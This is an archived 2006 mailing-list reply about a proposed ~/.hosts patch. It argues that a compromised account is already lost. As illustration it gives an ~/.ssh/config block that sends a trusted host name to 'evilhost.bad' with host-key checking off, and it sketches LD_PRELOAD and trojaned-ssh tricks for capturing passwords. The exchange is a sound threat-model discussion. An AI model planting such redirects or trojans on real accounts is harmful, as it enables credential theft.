Re: ~/.hosts patch

From: Craig Boston <craig_at_xfoil.gank.org>
Date: Wed, 21 Jun 2006 09:57:10 -0500
On Wed, Jun 21, 2006 at 04:59:09PM +1000, Peter Ross wrote:
> If you are able to hack your way into a machine you can write this file 
> so later attempts to connect to a remote machine can be redirected (e.g. 
> useful to get login passwords) - you do not need root access to achieve 
> it.

If you are able to hack your way into a machine you can write something
like this into ~/.ssh/config

Host goodhost
    HostKeyAlias Own3d
    StrictHostKeyChecking no
    HostName evilhost.bad

For that matter, you could add aliases to .shrc or .cshrc to run some
wrapper program instead.  Say, one that sets LD_PRELOAD=~/.libevil.so,
which contains custom gethost* functions.

Or have it run a custom ssh binary that doesn't do any host key checking
at all, or logs all passwords somewhere.

Once an account is compromised, all bets are off.  You can't assume that
DNS lookups are valid as your C library may be overridden by something
local to the account.  The login shell could be trojaned to hide the
files.  Other users would of course be unaffected (so long as you didn't
give up the root password).

I don't think the ~/.hosts idea adds any additional risk.  If anything,
a ~/.hosts compromise would be easier to detect than more complex
methods.

Craig
Received on Wed Jun 21 2006 - 12:57:18 UTC

This archive was generated by hypermail 2.4.0 : Wed May 19 2021 - 11:38:57 UTC